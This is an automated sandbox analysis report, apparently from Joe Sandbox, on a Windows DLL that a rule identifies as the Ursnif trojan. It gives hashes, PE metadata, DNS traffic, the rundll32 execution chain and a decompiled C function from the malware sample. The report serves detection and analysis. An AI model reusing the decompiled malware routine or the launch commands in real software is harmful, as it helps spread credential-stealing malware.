                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, wildcard.weather.microsoft.com.edgekey.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, tile-service.weather.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, e1553.dspg.akamaiedge.net
                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/404147/sample/8OKQ6ogGRx.dll

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains


                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{AE905FC9-AD44-11EB-90E4-ECF4BB862DED}.dat
                Process:C:\Program Files\internet explorer\iexplore.exe
                File Type:Microsoft Word Document
                Category:dropped
                Size (bytes):21592
                Entropy (8bit):1.7594977787918844
                Encrypted:false
                SSDEEP:48:IwiGcprjGwpL0qUG/ap80qGBZGIpc0qG4fGeGvnZpv0qG4fGvw3Go3qp90qG4fGm:rWZ9Za2wLWk7tkNfk4FMktH
                MD5:586DB94373650BC9E3A11F8D83A43119
                SHA1:44830C9A42A7059540F75902D8ACCCD0C2CCC110
                SHA-256:CBB34950E8F8B039E5E8A0C56C9F0409E3D51D1418EC7B6FA664F6B7598BBF15
                SHA-512:CB3756652C002D04099293D445F789B3E7466756473E5BF50A9EBE635BA65E76D6C36F1C54351A0C11CF2CD9772A70F4F4F67F498FCAD27312D4E7250CF7AE3C
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{AE905FCB-AD44-11EB-90E4-ECF4BB862DED}.dat
                Process:C:\Program Files\internet explorer\iexplore.exe
                File Type:Microsoft Word Document
                Category:dropped
                Size (bytes):16984
                Entropy (8bit):1.573944233836972
                Encrypted:false
                SSDEEP:48:IwMGcprRGwpapG4pQtGrapbShZGQpB2GHHpcIaTGUpG:rQZLQr6NBShzj12IqA
                MD5:3ECFC996F83DCA4AA885FF3F72B684AD
                SHA1:4D5F1BC278921B850632B9F131CEACF9F6528BAE
                SHA-256:94138719C28C299D93F3175DAC56C4A5A1097852F4410206DBDC1364FEA3C108
                SHA-512:47F4F94D461247526ECBF9999F81775CDAC82CE5FA41018ADBDCA8D2D13FF149FCB62E8BA274761AA1EB0FEFDD4CDCABE7E9A631AC00CE72BA31AD0667F360E8
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Local\Temp\~DFFDCA7E35786F02EC.TMP
                Process:C:\Program Files\internet explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):12917
                Entropy (8bit):0.39862566692758644
                Encrypted:false
                SSDEEP:24:c9lLh9lLh9lIn9lIn9lo0qDF9lo0qJ9lW0qGcGvwywcGtRwi:kBqoI0qS0qM0qGcGvwywcGtRwi
                MD5:5AC667C80F587E96B1FA80C48BB205AC
                SHA1:8AE06DAFAC5BD829EBDF2585C6BE72B11645F7EC
                SHA-256:4603ADFFB302AFD33E6755000AF43E78307809BE6060D50346B41AFFB2655282
                SHA-512:DA5BB434493D5023D766CCAD26D075683F287310E2FD53E2C51EDB7B0119B4DA534223D047822E72DF4F31C5838630386575432052267BB45C2FA524E63E2951
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Local\Temp\~DFFF4222CFAFFA654A.TMP
                Process:C:\Program Files\internet explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):25657
                Entropy (8bit):0.31341444137710367
                Encrypted:false
                SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwT9lwT9l2a:kBqoxKAuvScS+sKa
                MD5:B141DA2A351E435F1D185F48AC4E0FF6
                SHA1:A257DD1A9B4D1AB44020E74757AC5C9C69575588
                SHA-256:1D1C565FF314222220A0BDEADB603FCDE1A742DEA5A4210871A6C6E0AAE37C4A
                SHA-512:49E24F4266573BEC3E25D738F23A9D169F14FBA3FBC7F4C6F80A9657BBA4B5882A4477734AD04A45FE4EA57F11F1542657F1184D97AD1FD03BA659287AF18D5A
                Malicious:false
                Reputation:low

                Static File Info

                General

                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.549322455653532
                TrID:
                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                • Generic Win/DOS Executable (2004/3) 0.20%
                • DOS Executable Generic (2002/1) 0.20%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:8OKQ6ogGRx.dll
                File size:523264
                MD5:e8eae1a820426a722c7cae54ed5bacd8
                SHA1:4d8368f112e0c56e7caccb89724bfdad1999e706
                SHA256:eb498648d17ad5250ab1f38b190dd2da8bfa8db3ee86054db991db79d15ad5cc
                SHA512:b75df93529215c6003ddb86bc76a52144b29aec918a40a9dadec7446f67cc2626b67fa1738ed148e81a1c706dded69f609e1cd592cf13034ef9fd2cb21603032
                SSDEEP:12288:CdXaT8lLVrp6I7MsfHqWxSWlNTjGoLYTbgOJpXLH:CdXhp1YCMuFx/jGo0XL
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................^.G.......T......AN.......V.......i.......h.....^.B...............l.......U.......R.......W.....Rich...........

                File Icon

                Icon Hash:74f0e4ecccdce0e4

                Static PE Info

                General

                Entrypoint:0x104a38a
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x1000000
                Subsystem:windows gui
                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                Time Stamp:0x6089CC25 [Wed Apr 28 20:57:09 2021 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:61abfa6d76443dd7d018df0c9cf8b0a5

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                cmp dword ptr [ebp+0Ch], 01h
                jne 00007FCE58D690B7h
                call 00007FCE58D6F684h
                push dword ptr [ebp+10h]
                push dword ptr [ebp+0Ch]
                push dword ptr [ebp+08h]
                call 00007FCE58D690BCh
                add esp, 0Ch
                pop ebp
                retn 000Ch
                push 0000000Ch
                push 0107B4A8h
                call 00007FCE58D69FCCh
                xor eax, eax
                inc eax
                mov esi, dword ptr [ebp+0Ch]
                test esi, esi
                jne 00007FCE58D690BEh
                cmp dword ptr [0118E36Ch], esi
                je 00007FCE58D6919Ah
                and dword ptr [ebp-04h], 00000000h
                cmp esi, 01h
                je 00007FCE58D690B7h
                cmp esi, 02h
                jne 00007FCE58D690E7h
                mov ecx, dword ptr [01075238h]
                test ecx, ecx
                je 00007FCE58D690BEh
                push dword ptr [ebp+10h]
                push esi
                push dword ptr [ebp+08h]
                call ecx
                mov dword ptr [ebp-1Ch], eax
                test eax, eax
                je 00007FCE58D69167h
                push dword ptr [ebp+10h]
                push esi
                push dword ptr [ebp+08h]
                call 00007FCE58D68EC6h
                mov dword ptr [ebp-1Ch], eax
                test eax, eax
                je 00007FCE58D69150h
                mov ebx, dword ptr [ebp+10h]
                push ebx
                push esi
                push dword ptr [ebp+08h]
                call 00007FCE58D66926h
                mov edi, eax
                mov dword ptr [ebp-1Ch], edi
                cmp esi, 01h
                jne 00007FCE58D690DAh
                test edi, edi
                jne 00007FCE58D690D6h
                push ebx
                push eax
                push dword ptr [ebp+08h]
                call 00007FCE58D6690Eh
                push ebx
                push edi
                push dword ptr [ebp+08h]
                call 00007FCE58D68E8Ch
                mov eax, dword ptr [01075238h]
                test eax, eax
                je 00007FCE58D690B9h
                push ebx
                push edi
                push dword ptr [ebp+08h]
                call eax

                Data Directories

                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x7bbd0 | 0x58 | .rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7bc28 | 0x64 | .rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x191000 | 0x498 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x192000 | 0x2818 | .reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6b200 | 0x38 | .rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x7a980 | 0x40 | .rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x6b000 | 0x1ac | .rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                Sections

                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x6988d | 0x69a00 | False | 0.70416512574 | data | 6.62139930186 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata | 0x6b000 | 0x115e0 | 0x11600 | False | 0.471967738309 | data | 5.23669501131 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data | 0x7d000 | 0x113300 | 0x1800 | False | 0.333984375 | data | 3.88700180982 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc | 0x191000 | 0x498 | 0x600 | False | 0.356119791667 | data | 2.99935790597 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc | 0x192000 | 0x2818 | 0x2a00 | False | 0.743117559524 | data | 6.59705049508 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                Name | RVA | Size | Type | Language | Country
                RT_VERSION | 0x1910a0 | 0x35c | data | English | United States
                RT_MANIFEST | 0x191400 | 0x91 | XML 1.0 document text | English | United States

                Imports

                DLL | Import
                KERNEL32.dll | FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetEnvironmentVariableA, SetStdHandle, SetFilePointerEx, WriteConsoleW, CloseHandle, GetFileAttributesW, GetWindowsDirectoryW, CreateProcessW, OpenMutexW, VirtualProtectEx, EncodePointer, DecodePointer, HeapAlloc, GetSystemTimeAsFileTime, RaiseException, RtlUnwind, GetCommandLineA, GetCurrentThreadId, IsProcessorFeaturePresent, GetLastError, HeapFree, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, GetProcessHeap, IsDebuggerPresent, GetTimeZoneInformation, SetLastError, GetCurrentThread, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, QueryPerformanceCounter, GetCurrentProcessId, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, SetConsoleCtrlHandler, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, FreeLibrary, LoadLibraryExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, OutputDebugStringW, GetStringTypeW, CreateFileW
                USER32.dll | GetPropW, CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW
                GDI32.dll | MoveToEx, SetTextColor, SetBkMode, SetBkColor, LineTo, IntersectClipRect, GetClipBox, GetCharWidthW, CreateBitmap
                COMCTL32.dll | ImageList_SetDragCursorImage, ImageList_Draw, PropertySheetW, CreatePropertySheetPageA

                Exports

                Name | Ordinal | Address
                Enterbeen | 1 | 0x1047ed0
                Multiply | 2 | 0x1047fb0

                Version Infos

                Description | Data
                LegalCopyright | Fingergeneral Corporation. All rights reserved
                InternalName | Probable
                FileVersion | 5.5.2.216 Sidedone
                CompanyName | Fingergeneral Corporation
                ProductName | Fingergeneral Wear twenty
                ProductVersion | 5.5.2.216
                FileDescription | Fingergeneral Wear twenty
                OriginalFilename | turn.dll
                Translation | 0x0409 0x04b0

                Possible Origin

                Language of compilation system | Country where language is spoken
                English | United States

                Network Behavior

                Network Port Distribution

                UDP Packets


                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                May 4, 2021 18:53:28.937237978 CEST | 192.168.2.3 | 8.8.8.8 | 0x4990 | Standard query (0) | outlook.com | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:29.954231024 CEST | 192.168.2.3 | 8.8.8.8 | 0xea33 | Standard query (0) | www.outlook.com | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:30.180514097 CEST | 192.168.2.3 | 8.8.8.8 | 0x30ea | Standard query (0) | outlook.office365.com | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                May 4, 2021 18:53:28.986049891 CEST | 8.8.8.8 | 192.168.2.3 | 0x4990 | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:28.986049891 CEST | 8.8.8.8 | 192.168.2.3 | 0x4990 | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:28.986049891 CEST | 8.8.8.8 | 192.168.2.3 | 0x4990 | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:28.986049891 CEST | 8.8.8.8 | 192.168.2.3 | 0x4990 | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:28.986049891 CEST | 8.8.8.8 | 192.168.2.3 | 0x4990 | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:28.986049891 CEST | 8.8.8.8 | 192.168.2.3 | 0x4990 | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:28.986049891 CEST | 8.8.8.8 | 192.168.2.3 | 0x4990 | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:28.986049891 CEST | 8.8.8.8 | 192.168.2.3 | 0x4990 | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:30.011257887 CEST | 8.8.8.8 | 192.168.2.3 | 0xea33 | No error (0) | www.outlook.com | outlook.office365.com | | CNAME (Canonical name) | IN (0x0001)
                May 4, 2021 18:53:30.011257887 CEST | 8.8.8.8 | 192.168.2.3 | 0xea33 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
                May 4, 2021 18:53:30.011257887 CEST | 8.8.8.8 | 192.168.2.3 | 0xea33 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                May 4, 2021 18:53:30.011257887 CEST | 8.8.8.8 | 192.168.2.3 | 0xea33 | No error (0) | outlook.ms-acdc.office.com | FRA-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                May 4, 2021 18:53:30.011257887 CEST | 8.8.8.8 | 192.168.2.3 | 0xea33 | No error (0) | FRA-efz.ms-acdc.office.com | | 40.101.81.162 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:30.011257887 CEST | 8.8.8.8 | 192.168.2.3 | 0xea33 | No error (0) | FRA-efz.ms-acdc.office.com | | 40.101.12.98 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:30.011257887 CEST | 8.8.8.8 | 192.168.2.3 | 0xea33 | No error (0) | FRA-efz.ms-acdc.office.com | | 52.97.176.2 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:30.229265928 CEST | 8.8.8.8 | 192.168.2.3 | 0x30ea | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
                May 4, 2021 18:53:30.229265928 CEST | 8.8.8.8 | 192.168.2.3 | 0x30ea | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                May 4, 2021 18:53:30.229265928 CEST | 8.8.8.8 | 192.168.2.3 | 0x30ea | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                May 4, 2021 18:53:30.229265928 CEST | 8.8.8.8 | 192.168.2.3 | 0x30ea | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.138.2 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:30.229265928 CEST | 8.8.8.8 | 192.168.2.3 | 0x30ea | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.137.66 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:30.229265928 CEST | 8.8.8.8 | 192.168.2.3 | 0x30ea | No error (0) | HHN-efz.ms-acdc.office.com | | 40.101.138.18 | A (IP address) | IN (0x0001)
                May 4, 2021 18:53:30.229265928 CEST | 8.8.8.8 | 192.168.2.3 | 0x30ea | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.233.66 | A (IP address) | IN (0x0001)

                Code Manipulations

                System Behavior

                General

                Start time: 18:51:24
                Start date: 04/05/2021
                Path: C:\Windows\System32\loaddll32.exe
                Wow64 process (32bit): true
                Commandline: loaddll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll'
                Imagebase: 0x50000
                File size: 116736 bytes
                MD5 hash: 542795ADF7CC08EFCF675D65310596E8
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.470954657.0000000003618000.00000004.00000040.sdmp, Author: Joe Security
                Reputation: high

                General

                Start time: 18:51:25
                Start date: 04/05/2021
                Path: C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit): true
                Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
                Imagebase: 0xbd0000
                File size: 232960 bytes
                MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 18:51:25
                Start date: 04/05/2021
                Path: C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit): true
                Commandline: rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Enterbeen
                Imagebase: 0x9e0000
                File size: 61952 bytes
                MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 18:51:25
                Start date: 04/05/2021
                Path: C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit): true
                Commandline: rundll32.exe 'C:\Users\user\Desktop\8OKQ6ogGRx.dll',#1
                Imagebase: 0x9e0000
                File size: 61952 bytes
                MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 18:51:28
                Start date: 04/05/2021
                Path: C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit): true
                Commandline: rundll32.exe C:\Users\user\Desktop\8OKQ6ogGRx.dll,Multiply
                Imagebase: 0x9e0000
                File size: 61952 bytes
                MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 18:53:26
                Start date: 04/05/2021
                Path: C:\Program Files\internet explorer\iexplore.exe
                Wow64 process (32bit): false
                Commandline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                Imagebase: 0x7ff7e65e0000
                File size: 823560 bytes
                MD5 hash: 6465CB92B25A7BC1DF8E01D8AC5E7596
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                General

                Start time: 18:53:27
                Start date: 04/05/2021
                Path: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5212 CREDAT:17410 /prefetch:2
                Imagebase: 0xfd0000
                File size: 822536 bytes
                MD5 hash: 071277CC2E3DF41EEEA8013E2AB58D5A
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                Disassembly

                Code Analysis


                  Executed Functions

                  C-Code - Quality: 93%
                  			E00BB896F(signed char* __eax, intOrPtr* _a4) {
                  				signed int _v12;
                  				void* _v16;
                  				CHAR* _v20;
                  				struct _FILETIME _v28;
                  				void* _v32;
                  				void* _v36;
                  				char* _v40;
                  				signed int _v44;
                  				long _v344;
                  				struct _WIN32_FIND_DATAA _v368;
                  				signed int _t72;
                  				void* _t74;
                  				signed int _t76;
                  				void* _t78;
                  				intOrPtr _t81;
                  				CHAR* _t83;
                  				void* _t85;
                  				signed char _t89;
                  				signed char _t91;
                  				intOrPtr _t93;
                  				void* _t96;
                  				long _t99;
                  				int _t101;
                  				signed int _t109;
                  				char* _t111;
                  				void* _t113;
                  				int _t119;
                  				char _t128;
                  				void* _t134;
                  				signed int _t136;
                  				char* _t139;
                  				signed int _t140;
                  				char* _t141;
                  				char* _t146;
                  				signed char* _t148;
                  				int _t151;
                  				void* _t152;
                  				void* _t153;
                  				void* _t154;
                  				void* _t165;
                  
                  				_v12 = _v12 & 0x00000000;
                  				_t148 = __eax;
                  				_t72 =  *0xbbd2a0; // 0x63699bc3
                  				_t74 = RtlAllocateHeap( *0xbbd238, 0, _t72 ^ 0x63699ac7);
                  				_v20 = _t74;
                  				if(_t74 == 0) {
                  					L36:
                  					return _v12;
                  				}
                  				_t76 =  *0xbbd2a0; // 0x63699bc3
                  				_t78 = RtlAllocateHeap( *0xbbd238, 0, _t76 ^ 0x63699bce);
                  				_t146 = 0;
                  				_v36 = _t78;
                  				if(_t78 == 0) {
                  					L35:
                  					HeapFree( *0xbbd238, _t146, _v20);
                  					goto L36;
                  				}
                  				_t136 =  *0xbbd2a0; // 0x63699bc3
                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                  				_t81 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t154 = _t153 + 0xc;
                  				_t5 = _t81 + 0xbbe7f2; // 0x73797325
                  				_t83 = E00BB93FD(_t5);
                  				_v20 = _t83;
                  				if(_t83 == 0) {
                  					L34:
                  					HeapFree( *0xbbd238, _t146, _v36);
                  					goto L35;
                  				}
                  				_t134 = 0xffffffffffffffff;
                  				_v28.dwLowDateTime = 0x63699bce;
                  				_v28.dwHighDateTime = 0x63699bce;
                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                  				_v32 = _t85;
                  				if(_t85 != 0x63699bce) {
                  					GetFileTime(_t85,  &_v28, 0, 0);
                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                  					asm("adc dword [ebp-0x14], 0xc9"); // executed
                  					FindCloseChangeNotification(_v32); // executed
                  				}
                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                  				 *_t148 = _t91;
                  				_v32 = _t91 & 0x000000ff;
                  				_t93 =  *0xbbd2a4; // 0x2a5a5a8
                  				_t16 = _t93 + 0xbbe813; // 0x642e2a5c
                  				_v40 = _t146;
                  				_v44 = _t89 & 0x000000ff;
                  				__imp__(_v20, _t16);
                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                  				_v16 = _t96;
                  				if(_t96 == _t134) {
                  					_t146 = 0;
                  					goto L34;
                  				}
                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                  				while(_t99 > 0) {
                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                  					if(_t101 == 0) {
                  						FindClose(_v16);
                  						_v16 = FindFirstFileA(_v20,  &_v368);
                  						_v28.dwHighDateTime = _v344;
                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                  					}
                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                  				}
                  				_v12 = _v12 & 0x00000000;
                  				while(1) {
                  					_t109 = _v44;
                  					if(_v12 <= _t109) {
                  						goto L15;
                  					}
                  					_t140 = _v12;
                  					if(_t140 > _v32) {
                  						_t141 = _v36;
                  						 *_a4 = _t141;
                  						while(1) {
                  							_t128 =  *_t141;
                  							if(_t128 == 0) {
                  								break;
                  							}
                  							if(_t128 < 0x30) {
                  								 *_t141 = _t128 + 0x20;
                  							}
                  							_t141 = _t141 + 1;
                  						}
                  						_v12 = 1;
                  						FindClose(_v16); // executed
                  						_t146 = 0;
                  						goto L35;
                  					}
                  					_t165 = _t140 - _t109;
                  					L15:
                  					if(_t165 == 0 || _v12 == _v32) {
                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                  						_t139 = _v40;
                  						_t151 = _t111 -  &(_v368.cFileName);
                  						_t113 = 0;
                  						if(_t139 != 0) {
                  							_t48 = _t151 - 4; // -4
                  							_t113 = _t48;
                  							if(_t113 > _t151) {
                  								_t113 = 0;
                  							}
                  						}
                  						if(_t151 > 4) {
                  							_t151 = 4;
                  						}
                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                  						_t154 = _t154 + 0xc;
                  						_v40 =  &(_v40[_t151]);
                  					}
                  					do {
                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                  						if(_t119 == 0) {
                  							FindClose(_v16);
                  							_v16 = FindFirstFileA(_v20,  &_v368);
                  						}
                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                  					_v12 = _v12 + 1;
                  				}
                  			}

                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00BB899A
                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00BB89BC
                  • memset.NTDLL ref: 00BB89D6
                    • Part of subcall function 00BB93FD: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00BB197C,63699BCE,00BB89EF,73797325), ref: 00BB940E
                    • Part of subcall function 00BB93FD: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00BB9428
                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00BB8A14
                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00BB8A28
                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00BB8A3F
                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00BB8A4B
                  • lstrcat.KERNEL32(?,642E2A5C), ref: 00BB8A8C
                  • FindFirstFileA.KERNELBASE(?,?), ref: 00BB8AA2
                  • CompareFileTime.KERNEL32(?,?), ref: 00BB8AC0
                  • FindNextFileA.KERNELBASE(00BB8880,?), ref: 00BB8AD4
                  • FindClose.KERNEL32(00BB8880), ref: 00BB8AE1
                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB8AED
                  • CompareFileTime.KERNEL32(?,?), ref: 00BB8B0F
                  • StrChrA.SHLWAPI(?,0000002E), ref: 00BB8B42
                  • memcpy.NTDLL(00000000,?,00000000), ref: 00BB8B7B
                  • FindNextFileA.KERNELBASE(00BB8880,?), ref: 00BB8B90
                  • FindClose.KERNEL32(00BB8880), ref: 00BB8B9D
                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB8BA9
                  • CompareFileTime.KERNEL32(?,?), ref: 00BB8BB9
                  • FindClose.KERNELBASE(00BB8880), ref: 00BB8BEE
